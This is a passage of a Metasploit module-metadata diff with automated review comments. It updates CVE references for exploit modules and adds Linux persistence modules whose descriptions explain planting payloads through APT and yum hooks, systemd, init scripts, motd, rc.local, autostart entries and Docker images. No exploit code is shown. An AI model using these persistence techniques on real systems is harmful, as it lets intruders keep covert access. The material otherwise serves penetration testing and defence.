"rank": 600,
"disclosure_date": "2003-12-17",
"type": "exploit",
"author": [
"Aaron Ringo"
],
"description": "This module will run a payload when the package manager is used. No\n handler is ran automatically so you must configure an appropriate\n exploit/multi/handler to connect. Module modifies a yum plugin to\n launch a binary of choice. grep -F 'enabled=1' /etc/yum/pluginconf.d/\n will show what plugins are currently enabled on the system.",
"references": [],
"platform": "Linux,Unix",
"arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": [
"Automatic"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/linux/local/yum_package_manager_persistence.rb",
"is_install_path": true,
"ref_name": "linux/local/yum_package_manager_persistence",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Reliability": [
"unknown-reliability"
],
"Stability": [
"unknown-stability"
],
"SideEffects": [
"unknown-side-effects"
]
},
"session_types": [
"shell",
"meterpreter"
],
"needs_cleanup": true,
"actions": []
},
"exploit_linux/local/zimbra_postfix_priv_esc": {
"name": "Zimbra sudo + postfix privilege escalation",
"fullname": "exploit/linux/local/zimbra_postfix_priv_esc",
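Review bot: the removed yum_package_manager_persistence description carried an operational note the replacement drops: "No\n handler is ran automatically so you must configure an appropriate\n exploit/multi/handler to connect." The new linux/persistence/yum_package_manager entry later in this diff keeps the plugin-enumeration hint but not the handler note; carry it over, since the payload only fires on the next package-manager run and a user expecting a session at exploit time will otherwise conclude the module failed.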
@@ -93591,7 +93858,9 @@
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses the zsudo binary, installed with zpanel, to escalate\n privileges. In order to work, a session with access to zsudo on the sudoers\n configuration is needed. This module is useful for post exploitation of ZPanel\n vulnerabilities, where typically web server privileges are acquired, and this\n user is allowed to execute zsudo on the sudoers file.",
"references": [],
"references": [
"CVE-2013-10052"
],
"platform": "Linux,Unix",
"arch": "cmd, x86",
"rport": null,
@@ -93601,7 +93870,7 @@
"Command payload",
"Linux x86"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/local/zpanel_zsudo.rb",
"is_install_path": true,
"ref_name": "linux/local/zpanel_zsudo",
@@ -94733,6 +95002,7 @@
],
"description": "This module exploits a command injection vulnerability in IGEL OS Secure Terminal\n and Secure Shadow services.\n\n Both Secure Terminal (telnet_ssl_connector - 30022/tcp) and Secure\n Shadow (vnc_ssl_connector - 5900/tcp) services are vulnerable.",
"references": [
"CVE-2025-34082",
"URL-https://kb.igel.com/securitysafety/en/isn-2021-01-igel-os-remote-command-execution-vulnerability-41449239.html",
"URL-https://www.igel.com/wp-content/uploads/2021/02/lxos_11.04.270.txt"
],
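Review bot: the CVE-2025-34082 reference added here is dated four years after the vendor advisory it sits next to (ISN-2021-01 and lxos_11.04.270.txt, both 2021); confirm this is a retroactively assigned ID for the 2021 Secure Terminal/Secure Shadow command injection and not a newer IGEL issue, and consider listing the advisory identifier beside it so readers matching on CVE year do not take this for a 2025 bug. The same year mismatch appears in the Netcore hunk below (CVE-2025-34117 beside a 2014 Trend Micro write-up) and the BuilderEngine hunk (CVE-2025-34100 beside EDB-40390).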
@@ -94745,7 +95015,7 @@
"Secure Terminal Service",
"Secure Shadow Service"
],
"mod_time": "2021-04-30 15:38:57 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/misc/igel_command_injection.rb",
"is_install_path": true,
"ref_name": "linux/misc/igel_command_injection",
@@ -95029,6 +95299,7 @@
],
"description": "Routers manufactured by Netcore, a popular brand for networking\n equipment in China, have a wide-open backdoor that can be fairly\n easily exploited by attackers. These products are also sold under\n the Netis brand name outside of China. This backdoor allows\n cyber criminals to easily run arbitrary code on these routers,\n rendering it vulnerable as a security device.\n Some models include a non-standard echo command which doesn't\n honor -e, and are therefore not currently exploitable with\n Metasploit. See URLs or module markdown for additional options.",
"references": [
"CVE-2025-34117",
"URL-https://www.seebug.org/vuldb/ssvid-90227",
"URL-http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/",
"URL-https://github.com/h00die/MSF-Testing-Scripts/blob/master/netis_backdoor.py"
@@ -95042,7 +95313,7 @@
"MIPS Little Endian",
"MIPS Big Endian"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/misc/netcore_udp_53413_backdoor.rb",
"is_install_path": true,
"ref_name": "linux/misc/netcore_udp_53413_backdoor",
@@ -95413,6 +95684,7 @@
],
"description": "This module will cause remote code execution on several SerComm devices.\n These devices typically include routers from NetGear and Linksys.\n This module was tested successfully against several NetGear, Honeywell\n and Cisco devices.",
"references": [
"CVE-2014-0659",
"OSVDB-101653",
"URL-https://github.com/elvanderb/TCP-32764"
],
@@ -95435,7 +95707,7 @@
"Netgear DSG835",
"Netgear WPNT834"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/misc/sercomm_exec.rb",
"is_install_path": true,
"ref_name": "linux/misc/sercomm_exec",
@@ -95907,6 +96179,107 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/persistence/apt_package_manager": {
"name": "APT Package Manager Persistence",
"fullname": "exploit/linux/persistence/apt_package_manager",
"aliases": [
"exploits/linux/local/apt_package_manager_persistence"
],
"rank": 600,
"disclosure_date": "1999-03-09",
"type": "exploit",
"author": [
"Aaron Ringo"
],
"description": "This module will run a payload when the APT package manager is used.\n This module creates a pre-invoke hook for APT in apt.conf.d. Write access\n to the apt.conf.d directory is required, typically requiring root access.\n The hook name is randomized if not specified.\n Verified on Ubuntu 22.04",
"references": [],
"platform": "Linux,Unix",
"arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": [
"Automatic"
],
"mod_time": "2025-09-09 10:33:10 +0000",
"path": "/modules/exploits/linux/persistence/apt_package_manager.rb",
"is_install_path": true,
"ref_name": "linux/persistence/apt_package_manager",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session",
"event-dependent"
],
"SideEffects": [
"artifacts-on-disk",
"config-changes"
]
},
"session_types": [
"shell",
"meterpreter"
],
"needs_cleanup": true,
"actions": []
},
"exploit_linux/persistence/autostart": {
"name": "Autostart Desktop Item Persistence",
"fullname": "exploit/linux/persistence/autostart",
"aliases": [
"exploits/linux/local/autostart_persistence"
],
"rank": 600,
"disclosure_date": "2006-02-13",
"type": "exploit",
"author": [
"Eliott Teissonniere"
],
"description": "This module will create an autostart .desktop entry to execute a payload.\n The payload will be executed when the users logs in.\n Verified on Ubuntu 22.04 desktop with Gnome, and 18.04.3.\n The following payloads were used in testing:\n - cmd/unix/reverse_netcat\n - linux/x64/meterpreter/reverse_tcp\n - cmd/linux/http/x64/meterpreter/reverse_tcp",
"references": [
"ATT&CK-T1547.013",
"URL-https://specifications.freedesktop.org/autostart-spec/latest/"
],
"platform": "Linux,Unix",
"arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": [
"Automatic"
],
"mod_time": "2025-09-10 13:59:23 +0000",
"path": "/modules/exploits/linux/persistence/autostart.rb",
"is_install_path": true,
"ref_name": "linux/persistence/autostart",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session",
"event-dependent"
],
"SideEffects": [
"artifacts-on-disk",
"config-changes"
]
},
"session_types": [
"shell",
"meterpreter"
],
"needs_cleanup": true,
"actions": []
},
"exploit_linux/persistence/bash_profile": {
"name": "Bash Profile Persistence",
"fullname": "exploit/linux/persistence/bash_profile",
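Review bot: linux/persistence/apt_package_manager lands with "references": [] while its sibling autostart entry in the same hunk tags ATT&CK-T1547.013; an APT pre-invoke hook is event-triggered execution, so add the matching ATT&CK technique reference so the module turns up in technique-based searches like the rest of the persistence set. Minor: the alias on both entries is written "exploits/linux/local/…" whereas the rootkit_privesc_signal_hunter alias earlier in this diff uses "exploit/linux/local/…"; settle on one form so old-name lookups behave the same across modules.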
@@ -95931,7 +96304,7 @@
"targets": [
"Automatic"
],
"mod_time": "2025-09-01 18:09:25 +0000",
"mod_time": "2025-09-09 10:02:06 +0000",
"path": "/modules/exploits/linux/persistence/bash_profile.rb",
"is_install_path": true,
"ref_name": "linux/persistence/bash_profile",
@@ -95958,6 +96331,472 @@
"needs_cleanup": null,
"actions": []
},
"exploit_linux/persistence/docker_image": {
"name": "Docker Image Persistence",
"fullname": "exploit/linux/persistence/docker_image",
"aliases": [],
"rank": 600,
"disclosure_date": "2013-03-20",
"type": "exploit",
"author": [
"h00die"
],
"description": "This module maintains persistence on a host by creating a docker image which runs our\n payload, and has access to the host's file system (/host in the container). Whenever the\n container restarts, the payload will run, or when the payload dies the executable\n will run again after a delay. This will allow for writing back\n into the host through cron entries, ssh keys, or other method.\n\n Verified on Ubuntu 22.04.",
"references": [
"ATT&CK-T1610"
],
"platform": "Linux",
"arch": "x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": [
"Auto"
],
"mod_time": "2025-09-16 15:57:24 +0000",
"path": "/modules/exploits/linux/persistence/docker_image.rb",
"is_install_path": true,
"ref_name": "linux/persistence/docker_image",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"artifacts-on-disk",
"config-changes",
"ioc-in-logs"
]
},
"session_types": [
"meterpreter"
],
"needs_cleanup": true,
"actions": []
},
"exploit_linux/persistence/init_openrc": {
"name": "Init OpenRC Persistence",
"fullname": "exploit/linux/persistence/init_openrc",
"aliases": [
"exploits/linux/local/service_persistence"
],
"rank": 600,
"disclosure_date": "2007-04-05",
"type": "exploit",
"author": [
"h00die"
],
"description": "This module will create a service on the box via OpenRC, and mark it for auto-restart.\n We need enough access to write service files and potentially restart services.\n Verified against alpine 3.21.2",
"references": [
"URL-https://www.digitalocean.com/community/tutorials/how-to-configure-a-linux-service-to-start-automatically-after-a-crash-or-reboot-part-1-practical-examples",
"ATT&CK-T1543",
"URL-https://wiki.alpinelinux.org/wiki/Writing_Init_Scripts",
"URL-https://wiki.alpinelinux.org/wiki/OpenRC",
"URL-https://github.com/OpenRC/openrc/blob/master/service-script-guide.md"
],
"platform": "Linux,Unix",
"arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": [
"Automatic"
],
"mod_time": "2025-09-11 12:00:52 +0000",
"path": "/modules/exploits/linux/persistence/init_openrc.rb",
"is_install_path": true,
"ref_name": "linux/persistence/init_openrc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session",
"event-dependent"
],
"SideEffects": [
"artifacts-on-disk",
"config-changes"
]
},
"session_types": [
"shell",
"meterpreter"
],
"needs_cleanup": true,
"actions": []
},
"exploit_linux/persistence/init_systemd": {
"name": "Service SystemD Persistence",
"fullname": "exploit/linux/persistence/init_systemd",
"aliases": [
"exploits/linux/local/service_persistence"
],
"rank": 600,
"disclosure_date": "2010-03-30",
"type": "exploit",
"author": [
"h00die <mike@shorebreaksecurity.com>",
"Cale Black"
],
"description": "This module will create a service on the box, and mark it for auto-restart.\n We need enough access to write service files and potentially restart services\n Targets:\n CentOS 7\n Debian >= 7, <=8\n Fedora >= 15\n Ubuntu >= 15.04\n Verified on Ubuntu 18.04.3",
"references": [
"URL-https://www.digitalocean.com/community/tutorials/how-to-configure-a-linux-service-to-start-automatically-after-a-crash-or-reboot-part-1-practical-examples",
"URL-https://coreos.com/docs/launching-containers/launching/getting-started-with-systemd/",
"ATT&CK-T1543.002"
],
"platform": "Linux,Unix",
"arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": [
"systemd",
"systemd user"
],
"mod_time": "2025-09-09 16:19:32 +0000",
"path": "/modules/exploits/linux/persistence/init_systemd.rb",
"is_install_path": true,
"ref_name": "linux/persistence/init_systemd",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session",
"event-dependent"
],
"SideEffects": [
"artifacts-on-disk",
"config-changes"
]
},
"session_types": [
"shell",
"meterpreter"
],
"needs_cleanup": true,
"actions": []
},
"exploit_linux/persistence/init_systemd_override": {
"name": "Service SystemD override.conf Persistence",
"fullname": "exploit/linux/persistence/init_systemd_override",
"aliases": [],
"rank": 600,
"disclosure_date": "2010-03-30",
"type": "exploit",
"author": [
"h00die"
],
"description": "This module will create an override.conf file for a SystemD service on the box.\n The ExecStartPost hook is used to launch the payload after the service is started.\n We need enough access (typically root) to write in the /etc/systemd/system\n directory and potentially restart services.\n Verified on Ubuntu 22.04",
"references": [
"URL-https://www.freedesktop.org/software/systemd/man/latest/systemd.service.html",
"URL-https://askubuntu.com/a/659268",
"URL-https://wiki.archlinux.org/title/Systemd",
"ATT&CK-T1543.002"
],
"platform": "Linux,Unix",
"arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": [
"systemd",
"systemd user"
],
"mod_time": "2025-09-26 15:00:09 +0000",
"path": "/modules/exploits/linux/persistence/init_systemd_override.rb",
"is_install_path": true,
"ref_name": "linux/persistence/init_systemd_override",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session",
"event-dependent"
],
"SideEffects": [
"artifacts-on-disk",
"config-changes"
]
},
"session_types": [
"shell",
"meterpreter"
],
"needs_cleanup": true,
"actions": []
},
"exploit_linux/persistence/init_sysvinit": {
"name": "Service System V Persistence",
"fullname": "exploit/linux/persistence/init_sysvinit",
"aliases": [
"exploits/linux/local/service_persistence"
],
"rank": 600,
"disclosure_date": "1983-01-01",
"type": "exploit",
"author": [
"h00die"
],
"description": "This module will create a service via System V on the box, and mark it for auto-restart.\n We need enough access to write service files and potentially restart services.\n\n Some systems include backwards compatibility, such as Ubuntu up to about 16.04.\n\n Targets:\n CentOS <= 5\n Debian <= 6\n Kali 2.0\n Ubuntu <= 6.06\n Note: System V won't restart the service if it dies, only an init change (reboot etc) will restart it.\n\n Verified on Kali 2.0, Ubuntu 10.04",
"references": [
"URL-https://www.digitalocean.com/community/tutorials/how-to-configure-a-linux-service-to-start-automatically-after-a-crash-or-reboot-part-1-practical-examples",
"ATT&CK-T1543"
],
"platform": "Linux,Unix",
"arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": [
"System V"
],
"mod_time": "2025-10-14 19:30:06 +0000",
"path": "/modules/exploits/linux/persistence/init_sysvinit.rb",
"is_install_path": true,
"ref_name": "linux/persistence/init_sysvinit",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session",
"event-dependent"
],
"SideEffects": [
"artifacts-on-disk",
"config-changes"
]
},
"session_types": [
"shell",
"meterpreter"
],
"needs_cleanup": true,
"actions": []
},
"exploit_linux/persistence/init_upstart": {
"name": "Service Upstart Persistence",
"fullname": "exploit/linux/persistence/init_upstart",
"aliases": [
"exploits/linux/local/service_persistence"
],
"rank": 600,
"disclosure_date": "2006-08-24",
"type": "exploit",
"author": [
"h00die"
],
"description": "This module will create a service on the box, and mark it for auto-restart.\n We need enough access to write service files and potentially restart services\n Targets:\n CentOS 6\n Fedora >= 9, < 15\n Ubuntu >= 9.10, <= 14.10",
"references": [
"URL-https://www.digitalocean.com/community/tutorials/how-to-configure-a-linux-service-to-start-automatically-after-a-crash-or-reboot-part-1-practical-examples",
"ATT&CK-T1543",
"URL-http://blog.terminal.com/getting-started-with-upstart/"
],
"platform": "Linux,Unix",
"arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": [
"Upstart"
],
"mod_time": "2025-10-27 19:44:50 +0000",
"path": "/modules/exploits/linux/persistence/init_upstart.rb",
"is_install_path": true,
"ref_name": "linux/persistence/init_upstart",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session",
"event-dependent"
],
"SideEffects": [
"artifacts-on-disk",
"config-changes"
]
},
"session_types": [
"shell",
"meterpreter"
],
"needs_cleanup": true,
"actions": []
},
"exploit_linux/persistence/motd": {
"name": "update-motd.d Persistence",
"fullname": "exploit/linux/persistence/motd",
"aliases": [
"exploits/linux/local/motd_persistence"
],
"rank": 600,
"disclosure_date": "1999-01-01",
"type": "exploit",
"author": [
"Julien Voisin"
],
"description": "This module will add a script in /etc/update-motd.d/ in order to persist a payload.\n The payload will be executed with root privileges everytime a user logs in.\n Root privileges are likely required to write to /etc/update-motd.d/.\n Verified on Ubuntu 22.04",
"references": [
"URL-https://manpages.ubuntu.com/manpages/oracular/en/man5/update-motd.5.html"
],
"platform": "Linux,Unix",
"arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": [
"Automatic"
],
"mod_time": "2025-09-09 14:29:07 +0000",
"path": "/modules/exploits/linux/persistence/motd.rb",
"is_install_path": true,
"ref_name": "linux/persistence/motd",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session",
"event-dependent"
],
"SideEffects": [
"artifacts-on-disk"
]
},
"session_types": [
"shell",
"meterpreter"
],
"needs_cleanup": null,
"actions": []
},
"exploit_linux/persistence/rc_local": {
"name": "rc.local Persistence",
"fullname": "exploit/linux/persistence/rc_local",
"aliases": [
"exploits/linux/local/rc_local_persistence"
],
"rank": 600,
"disclosure_date": "1980-10-01",
"type": "exploit",
"author": [
"Eliott Teissonniere"
],
"description": "This module will edit /etc/rc.local in order to persist a payload.\n The payload will be executed on the next reboot.\n Verified on Ubuntu 18.04.3",
"references": [
"ATT&CK-T1037.004"
],
"platform": "Linux,Unix",
"arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": [
"Automatic"
],
"mod_time": "2025-09-09 14:58:09 +0000",
"path": "/modules/exploits/linux/persistence/rc_local.rb",
"is_install_path": true,
"ref_name": "linux/persistence/rc_local",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session",
"event-dependent"
],
"SideEffects": [
"artifacts-on-disk",
"config-changes"
]
},
"session_types": [
"shell",
"meterpreter"
],
"needs_cleanup": null,
"actions": []
},
"exploit_linux/persistence/yum_package_manager": {
"name": "Yum Package Manager Persistence",
"fullname": "exploit/linux/persistence/yum_package_manager",
"aliases": [
"exploits/linux/local/yum_package_manager_persistence"
],
"rank": 600,
"disclosure_date": "2003-12-17",
"type": "exploit",
"author": [
"Aaron Ringo"
],
"description": "This module will run a payload when the package manager is used.\n This module modifies a yum plugin to launch a binary of choice.\n grep -F 'enabled=1' /etc/yum/pluginconf.d/\n will show what plugins are currently enabled on the system.\n root persmissions are likely required.\n Verified on Centos 7.1",
"references": [],
"platform": "Linux,Unix",
"arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": [
"Automatic"
],
"mod_time": "2025-09-18 16:15:24 +0000",
"path": "/modules/exploits/linux/persistence/yum_package_manager.rb",
"is_install_path": true,
"ref_name": "linux/persistence/yum_package_manager",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session",
"event-dependent"
],
"SideEffects": [
"artifacts-on-disk",
"config-changes"
]
},
"session_types": [
"shell",
"meterpreter"
],
"needs_cleanup": true,
"actions": []
},
"exploit_linux/pop3/cyrus_pop3d_popsubfolders": {
"name": "Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow",
"fullname": "exploit/linux/pop3/cyrus_pop3d_popsubfolders",
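Review bot: init_openrc, init_systemd, init_sysvinit and init_upstart all declare the same alias, "exploits/linux/local/service_persistence", so the old module name now points at four different modules; an alias should map to exactly one, so attach it to a single replacement (or to an auto-selecting front module) and drop it from the others. Three smaller things in the same hunk: the init_sysvinit description lists "Ubuntu <= 6.06" under Targets but then says "Verified on Kali 2.0, Ubuntu 10.04" (the removed entry said "Ubuntu <= 9.04"), so the target line and the verification line disagree; "root persmissions are likely required" in yum_package_manager should read "permissions", and "everytime a user logs in" in motd should be "every time"; and motd and rc_local report "needs_cleanup": null while every other persistence entry here reports true, even though both list artifacts-on-disk, so confirm they implement cleanup.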
@@ -96218,6 +97057,7 @@
],
"description": "This module can be used to leverage the extension functionality added since Redis 4.0.0\n to execute arbitrary code. To transmit the given extension it makes use of the feature of Redis\n which called replication between master and slave.",
"references": [
"CVE-2018-11218",
"URL-https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf",
"URL-https://github.com/RedisLabs/RedisModulesSDK"
],
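Review bot: the CVE-2018-11218 reference added to redis_replication_cmd_exec does not appear to match the description, which covers loading an attacker-supplied extension through master/slave replication on Redis 4.0.0 and later, an abuse of a documented feature rather than a memory-safety bug; as far as I know CVE-2018-11218 is the cmsgpack stack overflow in Redis's Lua subsystem (fixed in 3.2.12 and 4.0.10), which this module never triggers. Please verify the ID against the advisory before landing, because vulnerability-management users correlate modules by CVE and a wrong one steers remediation to the wrong fix.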
@@ -96229,7 +97069,7 @@
"targets": [
"Automatic"
],
"mod_time": "2025-05-21 02:07:54 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/redis/redis_replication_cmd_exec.rb",
"is_install_path": true,
"ref_name": "linux/redis/redis_replication_cmd_exec",
@@ -96355,7 +97195,7 @@
"Linux SPARC64",
"Linux s390x"
],
"mod_time": "2025-06-06 12:39:33 +0000",
"mod_time": "2025-09-17 11:04:28 +0000",
"path": "/modules/exploits/linux/samba/is_known_pipename.rb",
"is_install_path": true,
"ref_name": "linux/samba/is_known_pipename",
@@ -97685,6 +98525,7 @@
],
"description": "This module exploits a command injection in the Belkin Wemo UPnP API via\n the SmartDevURL argument to the SetSmartDevInfo action.\n\n This module has been tested on a Wemo-enabled Crock-Pot, but other Wemo\n devices are known to be affected, albeit on a different RPORT (49153).",
"references": [
"CVE-2019-12780",
"URL-https://web.archive.org/web/20150901094849/http://disconnected.io/2014/04/04/universal-plug-and-fuzz/",
"URL-https://github.com/phikshun/ufuzz",
"URL-https://gist.github.com/phikshun/10900566",
@@ -97715,7 +98556,7 @@
"Unix In-Memory",
"Linux Dropper"
],
"mod_time": "2025-05-18 16:29:41 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb",
"is_install_path": true,
"ref_name": "linux/upnp/belkin_wemo_upnp_exec",
@@ -101030,6 +101871,7 @@
],
"description": "This module harnesses Maple's ability to create files and execute commands\n automatically when opening a Maplet. All versions up to 13 are suspected\n vulnerable. Testing was conducted with version 13 on Windows. Standard security\n settings prevent code from running in a normal maple worksheet without user\n interaction, but those setting do not prevent code in a Maplet from running.\n\n In order for the payload to be executed, an attacker must convince someone to\n open a specially modified .maplet file with Maple. By doing so, an attacker can\n execute arbitrary code as the victim user.",
"references": [
"CVE-2010-20120",
"OSVDB-64541",
"URL-http://www.maplesoft.com/products/maple/"
],
@@ -101045,7 +101887,7 @@
"Linux X64",
"Universal CMD"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/multi/fileformat/maple_maplet.rb",
"is_install_path": true,
"ref_name": "multi/fileformat/maple_maplet",
@@ -101896,6 +102738,7 @@
],
"description": "This module exploits an arbitrary command execution vulnerability in the\n AjaXplorer 'checkInstall.php' script. All versions of AjaXplorer prior to\n 2.6 are vulnerable.",
"references": [
"CVE-2010-10013",
"OSVDB-63552",
"BID-39334"
],
@@ -101920,7 +102763,7 @@
"targets": [
"AjaXplorer 2.5.5 or older"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/ajaxplorer_checkinstall_exec",
@@ -103357,6 +104200,7 @@
],
"description": "This module exploits a vulnerability found in Auxilium RateMyPet's. The site\n banner uploading feature can be abused to upload an arbitrary file to the web\n server, which is accessible in the 'banner' directory, thus allowing remote code\n execution.",
"references": [
"CVE-2012-10038",
"OSVDB-85554",
"EDB-21329"
],
@@ -103382,7 +104226,7 @@
"Generic (PHP Payload)",
"Linux x86"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/multi/http/auxilium_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/auxilium_upload_exec",
@@ -103782,6 +104626,7 @@
],
"description": "This module exploits a vulnerability found in BuilderEngine 3.5.0\n via elFinder 2.0. The jquery-file-upload plugin can be abused to upload a malicious\n file, which would result in arbitrary remote code execution under the context of\n the web server.",
"references": [
"CVE-2025-34100",
"EDB-40390"
],
"platform": "PHP",
@@ -103805,7 +104650,7 @@
"targets": [
"BuilderEngine 3.5.0"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/multi/http/builderengine_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/builderengine_upload_exec",
@@ -105178,6 +106023,7 @@
],
"description": "This module exploits a vulnerability in CuteFlow version 2.11.2 or prior.\n This application has an upload feature that allows an unauthenticated\n user to upload arbitrary files to the 'upload/___1/' directory\n and then execute it.",
"references": [
"CVE-2012-10050",
"URL-http://web.archive.org/web/20210922054637/https://itsecuritysolutions.org/2012-07-01-CuteFlow-2.11.2-multiple-security-vulnerabilities/",
"OSVDB-84829"
],
@@ -105202,7 +106048,7 @@
"targets": [
"Automatic Targeting"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/multi/http/cuteflow_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/cuteflow_upload_exec",
@@ -105659,6 +106505,7 @@
],
"description": "This module exploits an authentication bypass vulnerability in eXtplorer\n versions 2.1.0 to 2.1.2 and 2.1.0RC5 when run as a standalone application.\n This application has an upload feature that allows an authenticated user\n with administrator roles to upload arbitrary files to any writable\n directory in the web root. This module uses an authentication bypass\n vulnerability to upload and execute a file.",
"references": [
"CVE-2012-6710",
"OSVDB-88751",
"BID-57058",
"URL-http://web.archive.org/web/20230128023508/https://itsecuritysolutions.org/2012-12-31-eXtplorer-v2.1-authentication-bypass-vulnerability/",
@@ -105685,7 +106532,7 @@
"targets": [
"Automatic Targeting"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/multi/http/extplorer_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/extplorer_upload_exec",
@@ -105904,6 +106751,7 @@
],
"description": "This module exploits an arbitrary command execution flaw\n in FreeNAS 0.7.2 < rev.5543. When passing a specially formatted URL\n to the exec_raw.php page, an attacker may be able to execute arbitrary\n commands.\n\n NOTE: This module works best with php/meterpreter payloads.",
"references": [
"CVE-2010-20059",
"OSVDB-94441",
"URL-http://sourceforge.net/projects/freenas/files/stable/0.7.2/NOTES%200.7.2.5543.txt/download"
],
@@ -105928,7 +106776,7 @@
"targets": [
"Automatic Target"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/multi/http/freenas_exec_raw.rb",
"is_install_path": true,
"ref_name": "multi/http/freenas_exec_raw",
@@ -106088,6 +106936,7 @@
],
"description": "This module exploits a command injection flaw to create a shell script\n on the filesystem and execute it. If GestioIP is configured to use no authentication,\n no password is required to exploit the vulnerability. Otherwise, an authenticated\n user is required to exploit.",
"references": [
"CVE-2013-10039",
"URL-http://sourceforge.net/p/gestioip/gestioip/ci/ac67be9fce5ee4c0438d27dfa5c1dcbca08c457c/",
"URL-https://github.com/rapid7/metasploit-framework/pull/2461",
"URL-https://www.rapid7.com/blog/post/2013/10/03/gestioip-authenticated-remote-command-execution-module"
@@ -106113,7 +106962,7 @@
"targets": [
"Automatic GestioIP 3.0"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/multi/http/gestioip_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/gestioip_exec",
@@ -106504,7 +107353,7 @@
"Windows Command",
"Windows Dropper"
],
"mod_time": "2022-11-17 12:25:52 +0000",
"mod_time": "2025-10-26 19:19:11 +0000",
"path": "/modules/exploits/multi/http/gitea_git_fetch_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/gitea_git_fetch_rce",
@@ -107023,6 +107872,7 @@
],
